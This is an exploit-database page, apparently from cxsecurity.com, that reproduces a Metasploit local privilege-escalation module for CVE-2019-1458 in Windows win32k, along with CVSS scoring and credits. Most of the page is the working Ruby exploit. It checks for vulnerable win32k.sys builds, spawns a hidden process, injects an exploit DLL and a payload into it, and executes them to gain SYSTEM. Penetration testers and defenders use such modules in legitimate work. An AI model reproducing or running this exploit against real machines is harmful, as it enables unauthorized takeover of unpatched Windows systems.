Microsoft Windows Uninitialized Variable Local Privilege Escalation

2020.10.15
Credit: timwr
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/file' require 'msf/core/exploit/exe' require 'msf/core/post/windows/priv' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Post::Windows::Priv include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation', 'Description' => %q{ This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitalized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated. }, 'License' => MSF_LICENSE, 'Author' => [ 'piotrflorczyk', # poc 'unamer', # exploit 'timwr', # msf module ], 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'Targets' => [ ['Windows 7 x64', { 'Arch' => ARCH_X64 }] ], 'Notes' => { 'Stability' => [ CRASH_OS_RESTARTS ], 'Reliability' => [ UNRELIABLE_SESSION ] }, 'References' => [ ['CVE', '2019-1458'], ['URL', 'https://github.com/unamer/CVE-2019-1458'], ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'], ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'], ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html'] ], 'DisclosureDate' => '2019-12-10', 'DefaultTarget' => 0, 'AKA' => [ 'WizardOpium' ] ) ) register_options([ OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe']) ]) end def setup_process process_name = datastore['PROCESS'] begin print_status("Launching #{process_name} to host the exploit...") launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true) process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_error('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end process end def check sysinfo_value = sysinfo['OS'] if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return CheckCode::Safe end file_path = expand_path('%WINDIR%\\system32\\win32k.sys') major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") build_num_gemversion = Gem::Version.new("#{major}.#{minor}.#{build}.#{revision}") # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/ if (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008 return CheckCode::Appears elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2 return CheckCode::Appears elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012 return CheckCode::Appears elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2 return CheckCode::Appears elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507 return CheckCode::Appears elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511 return CheckCode::Appears elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607 return CheckCode::Appears else return CheckCode::Safe end end def exploit super if is_system? fail_with(Failure::None, 'Session is already elevated') end if sysinfo['Architecture'] != ARCH_X64 fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported') end process = setup_process library_data = exploit_data('CVE-2019-1458', 'exploit.dll') print_status("Injecting exploit into #{process.pid} ...") exploit_mem, offset = inject_dll_data_into_process(process, library_data) print_status("Exploit injected. Injecting payload into #{process.pid}...") encoded_payload = payload.encoded payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) end end


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top